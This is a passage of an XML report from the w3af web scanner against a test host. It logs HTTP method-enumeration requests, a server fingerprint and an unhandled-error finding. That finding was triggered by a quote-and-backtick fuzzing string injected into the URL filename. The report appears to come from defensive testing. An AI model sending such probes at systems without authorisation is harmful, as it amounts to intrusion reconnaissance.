                <http-request>
                    <status>MOVE http://10.12.68.43:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="86">
                <http-request>
                    <status>HEAD http://10.12.68.43:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                </http-response>
            </http-transaction>
            <http-transaction id="208">
                <http-request>
                    <status>REPORT http://10.12.68.43:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="241">
                <http-request>
                    <status>NOTIFY http://10.12.68.43:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="254">
                <http-request>
                    <status>OPTIONS http://10.12.68.43:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="327">
                <http-request>
                    <status>GET http://10.12.68.43:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;p&gt;&lt;a href='/post'&gt;leave a message!&lt;/a&gt;&lt;/p&gt;
    &lt;hr /&gt;
        &lt;p&gt;manny&lt;/p&gt;
        &lt;p&gt;beautiful website!&lt;/p&gt;
        &lt;hr /&gt;
        &lt;p&gt;manny&lt;/p&gt;
        &lt;p&gt;i've got nothing else to do&lt;/p&gt;
        &lt;hr /&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="437">
                <http-request>
                    <status>CHECKOUT http://10.12.68.43:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="482">
                <http-request>
                    <status>PROPFIND http://10.12.68.43:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="516">
                <http-request>
                    <status>SUBSCRIBE http://10.12.68.43:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="540">
                <http-request>
                    <status>LOCK http://10.12.68.43:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="569">
                <http-request>
                    <status>MKDIR http://10.12.68.43:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="628">
                <http-request>
                    <status>MKWORKSPACE http://10.12.68.43:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="close" field="connection"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="652">
                <http-request>
                    <status>MERGE http://10.12.68.43:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="678">
                <http-request>
                    <status>UNLOCK http://10.12.68.43:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="705">
                <http-request>
                    <status>PROPPATCH http://10.12.68.43:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="765">
                <http-request>
                    <status>POST http://10.12.68.43:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="0" field="Content-length"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="application/x-www-form-urlencoded" field="Content-type"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="791">
                <http-request>
                    <status>COPY http://10.12.68.43:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="821">
                <http-request>
                    <status>TRACE http://10.12.68.43:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="847">
                <http-request>
                    <status>PATCH http://10.12.68.43:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="871">
                <http-request>
                    <status>UNSUBSCRIBE http://10.12.68.43:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="887">
                <http-request>
                    <status>MKACTIVITY http://10.12.68.43:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
        </http-transactions>
    </vulnerability>
    <vulnerability id="[1]" method="GET" name="Webserver fingerprint" plugin="hmap" severity="Information" url="None" var="None">
        <description>The most accurate fingerprint for this HTTP server is: &quot;JigSaw 2.2.2 (Solaris 8)&quot;.</description>
        <http-transactions>
            <http-transaction id="1">
                <http-request>
                    <status>GET http://10.12.68.43:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;p&gt;&lt;a href='/post'&gt;leave a message!&lt;/a&gt;&lt;/p&gt;
    &lt;hr /&gt;
        &lt;p&gt;manny&lt;/p&gt;
        &lt;p&gt;beautiful website!&lt;/p&gt;
        &lt;hr /&gt;
        &lt;p&gt;manny&lt;/p&gt;
        &lt;p&gt;i've got nothing else to do&lt;/p&gt;
        &lt;hr /&gt;
</body>
                </http-response>
            </http-transaction>
        </http-transactions>
    </vulnerability>
    <vulnerability id="[252, 292, 316]" method="GET" name="Unhandled error in web application" plugin="generic" severity="Low" url="http://10.12.68.43:31337/d%27kc%22z%27gj%27%22%2A%2A5%2A%28%28%28%3B-%2A%60%29" var="token">
        <description>An unhandled error, which could potentially translate to a vulnerability, was found at: &quot;http://10.12.68.43:31337/d%27kc%22z%27gj%27%22%2A%2A5%2A%28%28%28%3B-%2A%60%29&quot;, using HTTP method GET. The modified parameter was the URL filename, with value: &quot;d'kc&quot;z'gj'&quot;**5*(((;-*`)&quot;.</description>
        <long-description>Information Leakage is an application weakness where an application reveals sensitive data, such as technical details of the web application, environment, or user-specific data. Sensitive data may be used by an attacker to exploit the target web application, its hosting network, or its users. 

 In its most common form, information leakage is the result of one or more of the following conditions:
 * A failure to scrub out HTML/Script comments containing sensitive information
 * Improper application or server configurations
 * Improper application error handling
</long-description>
        <fix-guidance> * Ensure that the application source handles exceptions and errors in a such a way that no sensitive information is disclosed to the users
 * Configure the application server to handle and log any exceptions that the application might yield
</fix-guidance>
        <fix-effort>60</fix-effort>
        <references>
            <reference title="WASC threat classification" url="http://projects.webappsec.org/w/page/13246936/Information%20Leakage"/>
        </references>
        <http-transactions>
            <http-transaction id="252">
                <http-request>
